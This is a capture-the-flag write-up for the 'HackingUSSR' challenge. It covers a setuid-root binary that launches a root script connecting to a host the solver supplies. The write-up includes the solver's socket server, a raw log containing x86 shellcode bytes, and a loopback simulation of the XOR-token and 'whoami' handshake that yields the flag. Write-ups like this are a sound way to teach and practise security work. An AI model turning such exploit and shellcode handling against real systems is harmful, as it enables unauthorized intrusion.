# HackingUSSR
by mito
## 18 Solves, 489pt
This challenge is to connect with `ssh` and look for the flag.
```
$ ssh -p 41705 [email protected]
[email protected]'s password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
youngPioneer@fd32dfdbd392:~$ ls -l
total 16
-rw-rw-r-- 1 root root 414 Apr 13 15:47 README
-rwsr-sr-x 1 root root 8696 Apr 17 21:39 throw
youngPioneer@fd32dfdbd392:~$
```
We transferred the `throw` binary to our local machine by base64-encoding it.
The result of decompiling the `throw` binary with `IDA` is as follows.
`/root/throw.py` itself cannot be read because it is under `/root`.
```
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char *envpa; // [rsp+10h] [rbp-10h]
  __int64 v5; // [rsp+18h] [rbp-8h]

  // envpa and v5 are laid out consecutively on the stack and together form
  // the envp array {"TERM=vt100", NULL} passed to the script.
  envpa = "TERM=vt100";
  v5 = 0LL;
  // setuid/setgid root binary: the script runs as root with our argv.
  execve("/root/throw.py", (char *const *)argv, &envpa);
  perror("execv");
  return 1;
}
```
When `throw` is executed, the following usage message is displayed, so it is necessary to have the script connect to a server we control.
We therefore set up `NAT` on the WiFi router so that the connection could reach our local server.
```
youngPioneer@fd32dfdbd392:~$ ./throw
usage: /root/throw.py ATTACK_HOST ATTACK_PORT
```
We wrote a server program that sends replies based on the contents received from the `throw` binary.
Finally, by answering `root` to `whoami`, we got the script to send the flag.
```
import socket

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind(('192.168.11.49', 31336))
    s.listen(1)
    while True:
        conn, addr = s.accept()
        with conn:
            # First message: the "sploit" payload; a 16-byte token follows "/bin/sh\0"
            data = conn.recv(1024)
            print('data : {}, addr: {}'.format(data, addr))
            p = data.find(b"/bin/sh")
            a = data[p+8:p+24]
            print(a)
            # Reply with every token byte XORed with 0x41 ('A')
            f = ""
            for i in range(16):
                f += chr(a[i] ^ 0x41)
            conn.sendall(f.encode(encoding='utf-8'))
            # Second message: "whoami"; answering "root" passes the script's check
            data = conn.recv(1024)
            print('data : {}, addr: {}'.format(data, addr))
            conn.sendall(b"root\n")
            # Third message: the command that contains the flag
            data = conn.recv(1024)
            print('data : {}, addr: {}'.format(data, addr))
```
The execution result of the server program is as follows.
```
$ python3 server.py
data : b'\xebUAAAAAAAAAAAAAAAAAAAAAAAAAA\xc0\xc7\xff\xff[\x8ds\x081\xc9\x83\xc1\x041.\x83\xc6\x04\xe2\xf9S\xba\x10\x00\x00\x00\x8dK\x08\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80[1\xc9QS\x89\xe11\xd2\xb8\x0b\x00\x00\x00\xcd\x80\xeb\xfe\xe8\xc4\xff\xff\xff/bin/sh\x00B1E4dE7eeec14f94\n', addr: ('152.14.93.208', 60332)
b'B1E4dE7eeec14f94'
data : b'whoami\n', addr: ('152.14.93.208', 60332)
data : b'echo "flag{tw0_p1u$_t00_equ@15_wh@t3v3r_th3_p@rty_s@y5_c0mr@d3}" > /etc/motd\n', addr: ('152.14.93.208', 60332)
```
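The three-step exchange above, written out as an added example (this is not the writeup's server nor the challenge's `throw.py`): a handler that parses the token, answers the XOR and the `whoami` check, plus a constructed stand-in client that sends the same three messages over loopback so the whole exchange can be run offline. It assumes the message layout seen in the capture (a 16-byte token directly after `/bin/sh\0`, XOR key 0x41); the placeholder payload bytes, `fake_throw_client` and `simulate_exchange` are constructed for the example, not taken from the challenge.

```python
import socket
import threading

# Layout observed in the captured first message: the token follows "/bin/sh\0".
TOKEN_MARKER = b"/bin/sh\x00"
TOKEN_LEN = 16
XOR_KEY = 0x41  # 'A', the key the writeup's server applies to the token


def extract_token(payload: bytes) -> bytes:
    """Return the token that follows "/bin/sh\\0" in the first message.

    Raises ValueError if the marker is missing or the token is truncated,
    instead of silently slicing from offset -1 as a bare find() would.
    """
    p = payload.find(TOKEN_MARKER)
    if p < 0:
        raise ValueError("no /bin/sh marker in payload")
    start = p + len(TOKEN_MARKER)
    token = payload[start:start + TOKEN_LEN]
    if len(token) != TOKEN_LEN:
        raise ValueError("token truncated")
    return token


def xor_token(token: bytes, key: int = XOR_KEY) -> bytes:
    """XOR every token byte with key, working on bytes rather than str."""
    return bytes(b ^ key for b in token)


def serve_one(conn: socket.socket) -> list:
    """Drive the three-step exchange on an accepted connection.

    Returns the three messages received so the caller can inspect the
    final command without relying on printed output.
    """
    received = []
    payload = conn.recv(4096)
    received.append(payload)
    conn.sendall(xor_token(extract_token(payload)))
    question = conn.recv(1024)
    received.append(question)
    if question.strip() == b"whoami":
        conn.sendall(b"root\n")
    final = conn.recv(1024)
    received.append(final)
    return received


def fake_throw_client(port: int, token: bytes) -> list:
    """Constructed stand-in for throw.py: sends the same three messages."""
    answers = []
    with socket.create_connection(("127.0.0.1", port)) as c:
        # Constructed payload: filler bytes stand in for the real shellcode.
        c.sendall(b"\x90" * 8 + TOKEN_MARKER + token + b"\n")
        answers.append(c.recv(1024))
        c.sendall(b"whoami\n")
        answers.append(c.recv(1024))
        c.sendall(b'echo "flag{...}" > /etc/motd\n')
    return answers


def simulate_exchange(token: bytes = b"B1E4dE7eeec14f94") -> tuple:
    """Run server and fake client over loopback; return (server_msgs, client_answers)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # ephemeral port; no NAT needed for the simulation
    srv.listen(1)
    port = srv.getsockname()[1]
    result = {}

    def run_server():
        conn, _ = srv.accept()
        with conn:
            result["server"] = serve_one(conn)

    t = threading.Thread(target=run_server)
    t.start()
    answers = fake_throw_client(port, token)
    t.join()
    srv.close()
    return result["server"], answers


if __name__ == "__main__":
    msgs, answers = simulate_exchange()
    for m in msgs:
        print("server got:", m)
    for a in answers:
        print("client got:", a)
```

Unlike the writeup's `chr(...)` loop followed by `.encode('utf-8')`, `xor_token` works on bytes end to end, so a token byte above 0x7f would not be expanded into a two-byte UTF-8 sequence; and `extract_token` refuses a message without the marker rather than slicing from offset -1.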
The execution result of `throw` binary is as follows.
```
youngPioneer@0f681065a144:~$ ./throw 58.xxx.xxx.xxx 31336
$<5>[$<2>+] Opening connection to 58.xxx.xxx.xxx on port 31336: Done
$<5>Sending sploit...
W00t! Sending `whoami`...
W00t! Sending `echo "flag{tw0_p1u$_t00_equ@15_wh@t3v3r_th3_p@rty_s@y5_c0mr@d3}" > /etc/motd`
[$<2>*] Closed connection to 58.xxx.xxx.xxx port 31336
youngPioneer@0f681065a144:~$
```